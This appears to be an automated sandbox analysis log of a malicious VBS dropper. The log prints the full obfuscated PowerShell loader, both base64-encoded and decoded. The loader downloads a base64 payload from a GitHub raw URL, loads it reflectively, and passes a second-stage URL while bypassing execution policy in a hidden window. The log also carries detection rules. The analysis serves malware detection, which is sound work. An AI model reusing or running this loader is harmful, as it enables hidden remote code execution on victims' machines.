Source: powershell.exe, 00000006.00000002.1348872454.00000177588D9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000006.00000002.1348872454.0000017758ACE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000004.00000002.1396024247.000001C822913000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1396024247.000001C8228EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1348872454.00000177571B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000006.00000002.1348872454.0000017758B54000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.1348872454.0000017758B54000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.1348872454.0000017758B54000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000006.00000002.1348872454.0000017758ACE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000006.00000002.1348872454.00000177582C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000006.00000002.1364577618.0000017767224000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1348872454.0000017758B54000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000006.00000002.1348872454.00000177588D9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000006.00000002.1348872454.00000177588D9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000006.00000002.1348872454.000001775888B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercont
Source: powershell.exe, 00000006.00000002.1348872454.00000177573D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1348872454.00000177582C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000006.00000002.1348872454.00000177573D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1348872454.00000177582C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
Source: powershell.exe, 00000006.00000002.1348872454.00000177573D3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtUNI;
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.7:49704 version: TLS 1.2

System Summary

Source: Process Memory Space: powershell.exe PID: 2980, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7304, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFblY6Y09NU1BlQ1s0LDE1LDI1XS1qT2lOJycpKCAoKCdzQk91cmwgJysnPSBVJysnTkloJysndHRwczonKycvL3Jhdy4nKydnaXRodWInKyd1c2UnKydyY29udCcrJ2VudC4nKydjb20nKycvJysnTicrJ29EZXQnKydlY3RPbi9Ob0RldCcrJ2VjdE8nKyduLycrJ3JlJysnZnMvaGVhZCcrJ3MvbWFpbi9EZXRhaCcrJ05vJysndGgtVi4nKyd0JysneHRVJysnTkk7IHNCJysnT2JhJysncycrJ2U2JysnNEMnKydvbnRlbnQgPSAoTmUnKyd3LU9iamVjJysndCAnKydTJysneXN0JysnZScrJ20nKycuTmV0LlcnKydlYkNsaWVudCkuRG93JysnbmxvYWRTdHInKydpbmcnKycoJysnc0JPdXJsJysnKTsgc0InKydPYmluYXInKyd5JysnQ29udGVudCAnKyc9IFtTJysneScrJ3N0ZScrJ20uQ28nKyduJysndicrJ2VydCcrJ106OkZyb21CJysnYScrJ3MnKydlNjRTJysndHJpbmcnKycoc0JPJysnYmFzZTY0QycrJ28nKydudGVudCk7JysnIHMnKydCT2FzJysnc2VtJysnYmx5ID0gW1JlZmxlY3Rpb24uJysnQXNzZW0nKydiJysnbCcrJ3ldOjonKydMb2EnKydkKCcrJ3NCT2JpbmFyeUNvbnRlbicrJ3QpOyBbJysnZG5saScrJ2IuSU8uJysnSG9tZV0nKyc6OlZBSScrJygnKydoUEl0eHQuUlInKydCRCcrJ0wvMDU0LzQzJysnMS4nKyc5JysnMicrJzEuNjQuJysnODknKycxLy8nKyc6cHR0aGhQSSwgJysnaFBJZGVzYXRpdicrJ2EnKydkb2hQSSwgJysnaFAnKydJZCcrJ2UnKydzJysnYXQnKydpdmFkbycrJ2hQSSwgaCcrJ1BJJysnZGVzYXRpdmEnKydkbycrJ2gnKydQSSwgJysnaFAnKydJYXNwJysnbmV0X3JlZ2Jyb3dzJysnZScrJ3JzaFBJLCcrJyBoUEknKydoJysnUEksJysnaFBJaCcrJ1AnKydJKScpLUNSZVBsQWNFICdVTkknLFtDaGFSXTM5ICAtcmVQTEFjZSAgJ2hQSScsW0NoYVJdMzQgIC1yZVBMQWNlICAoW0NoYVJdMTE1K1tDaGFSXTY2K1tDaGFSXTc5KSxbQ2hhUl0zNikp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFAAC540FFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FFAAC6331D2
Source: uLfuBVyZFV.vbs | Initial sample: Strings found which are bigger than 50
Source: Process Memory Space: powershell.exe PID: 2980, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7304, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine | Classification label: mal100.expl.evad.winVBS@6/5@1/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7180:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_thwqgli0.33f.ps1
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\uLfuBVyZFV.vbs"
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\uLfuBVyZFV.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFblY6Y09NU1BlQ1s0LDE1LDI1XS1qT2lOJycpKCAoKCdzQk91cmwgJysnPSBVJysnTkloJysndHRwczonKycvL3Jhdy4nKydnaXRodWInKyd1c2UnKydyY29udCcrJ2VudC4nKydjb20nKycvJysnTicrJ29EZXQnKydlY3RPbi9Ob0RldCcrJ2VjdE8nKyduLycrJ3JlJysnZnMvaGVhZCcrJ3MvbWFpbi9EZXRhaCcrJ05vJysndGgtVi4nKyd0JysneHRVJysnTkk7IHNCJysnT2JhJysncycrJ2U2JysnNEMnKydvbnRlbnQgPSAoTmUnKyd3LU9iamVjJysndCAnKydTJysneXN0JysnZScrJ20nKycuTmV0LlcnKydlYkNsaWVudCkuRG93JysnbmxvYWRTdHInKydpbmcnKycoJysnc0JPdXJsJysnKTsgc0InKydPYmluYXInKyd5JysnQ29udGVudCAnKyc9IFtTJysneScrJ3N0ZScrJ20uQ28nKyduJysndicrJ2VydCcrJ106OkZyb21CJysnYScrJ3MnKydlNjRTJysndHJpbmcnKycoc0JPJysnYmFzZTY0QycrJ28nKydudGVudCk7JysnIHMnKydCT2FzJysnc2VtJysnYmx5ID0gW1JlZmxlY3Rpb24uJysnQXNzZW0nKydiJysnbCcrJ3ldOjonKydMb2EnKydkKCcrJ3NCT2JpbmFyeUNvbnRlbicrJ3QpOyBbJysnZG5saScrJ2IuSU8uJysnSG9tZV0nKyc6OlZBSScrJygnKydoUEl0eHQuUlInKydCRCcrJ0wvMDU0LzQzJysnMS4nKyc5JysnMicrJzEuNjQuJysnODknKycxLy8nKyc6cHR0aGhQSSwgJysnaFBJZGVzYXRpdicrJ2EnKydkb2hQSSwgJysnaFAnKydJZCcrJ2UnKydzJysnYXQnKydpdmFkbycrJ2hQSSwgaCcrJ1BJJysnZGVzYXRpdmEnKydkbycrJ2gnKydQSSwgJysnaFAnKydJYXNwJysnbmV0X3JlZ2Jyb3dzJysnZScrJ3JzaFBJLCcrJyBoUEknKydoJysnUEksJysnaFBJaCcrJ1AnKydJKScpLUNSZVBsQWNFICdVTkknLFtDaGFSXTM5ICAtcmVQTEFjZSAgJ2hQSScsW0NoYVJdMzQgIC1yZVBMQWNlICAoW0NoYVJdMTE1K1tDaGFSXTY2K1tDaGFSXTc5KSxbQ2hhUl0zNikp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $EnV:cOMSPeC[4,15,25]-jOiN'')( (('sBOurl '+'= U'+'NIh'+'ttps:'+'//raw.'+'github'+'use'+'rcont'+'ent.'+'com'+'/'+'N'+'oDet'+'ectOn/NoDet'+'ectO'+'n/'+'re'+'fs/head'+'s/main/Detah'+'No'+'th-V.'+'t'+'xtU'+'NI; sB'+'Oba'+'s'+'e6'+'4C'+'ontent = (Ne'+'w-Objec'+'t '+'S'+'yst'+'e'+'m'+'.Net.W'+'ebClient).Dow'+'nloadStr'+'ing'+'('+'sBOurl'+'); sB'+'Obinar'+'y'+'Content '+'= [S'+'y'+'ste'+'m.Co'+'n'+'v'+'ert'+']::FromB'+'a'+'s'+'e64S'+'tring'+'(sBO'+'base64C'+'o'+'ntent);'+' s'+'BOas'+'sem'+'bly = [Reflection.'+'Assem'+'b'+'l'+'y]::'+'Loa'+'d('+'sBObinaryConten'+'t); ['+'dnli'+'b.IO.'+'Home]'+'::VAI'+'('+'hPItxt.RR'+'BD'+'L/054/43'+'1.'+'9'+'2'+'1.64.'+'89'+'1//'+':ptthhPI, '+'hPIdesativ'+'a'+'dohPI, '+'hP'+'Id'+'e'+'s'+'at'+'ivado'+'hPI, h'+'PI'+'desativa'+'do'+'h'+'PI, '+'hP'+'Iasp'+'net_regbrows'+'e'+'rshPI,'+' hPI'+'h'+'PI,'+'hPIh'+'P'+'I)')-CRePlAcE 'UNI',[ChaR]39 -rePLAce 'hPI',[ChaR]34 -rePLAce ([ChaR]115+[ChaR]66+[ChaR]79),[ChaR]36))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $EnV:cOMSPeC[4,15,25]-jOiN'')( (('sBOurl '+'= U'+'NIh'+'ttps:'+'//raw.'+'github'+'use'+'rcont'+'ent.'+'com'+'/'+'N'+'oDet'+'ectOn/NoDet'+'ectO'+'n/'+'re'+'fs/head'+'s/main/Detah'+'No'+'th-V.'+'t'+'xtU'+'NI; sB'+'Oba'+'s'+'e6'+'4C'+'ontent = (Ne'+'w-Objec'+'t '+'S'+'yst'+'e'+'m'+'.Net.W'+'ebClient).Dow'+'nloadStr'+'ing'+'('+'sBOurl'+'); sB'+'Obinar'+'y'+'Content '+'= [S'+'y'+'ste'+'m.Co'+'n'+'v'+'ert'+']::FromB'+'a'+'s'+'e64S'+'tring'+'(sBO'+'base64C'+'o'+'ntent);'+' s'+'BOas'+'sem'+'bly = [Reflection.'+'Assem'+'b'+'l'+'y]::'+'Loa'+'d('+'sBObinaryConten'+'t); ['+'dnli'+'b.IO.'+'Home]'+'::VAI'+'('+'hPItxt.RR'+'BD'+'L/054/43'+'1.'+'9'+'2'+'1.64.'+'89'+'1//'+':ptthhPI, '+'hPIdesativ'+'a'+'dohPI, '+'hP'+'Id'+'e'+'s'+'at'+'ivado'+'hPI, h'+'PI'+'desativa'+'do'+'h'+'PI, '+'hP'+'Iasp'+'net_regbrows'+'e'+'rshPI,'+' hPI'+'h'+'PI,'+'hPIh'+'P'+'I)')-CRePlAcE 'UNI',[ChaR]39 -rePLAce 'hPI',[ChaR]34 -rePLAce ([ChaR]115+[ChaR]66+[ChaR]79),[ChaR]36))"
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000006.00000002.1391686254.00007FFAAC7A0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: ows\dll\System.pdbsv source: powershell.exe, 00000006.00000002.1382179143.000001776F323000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
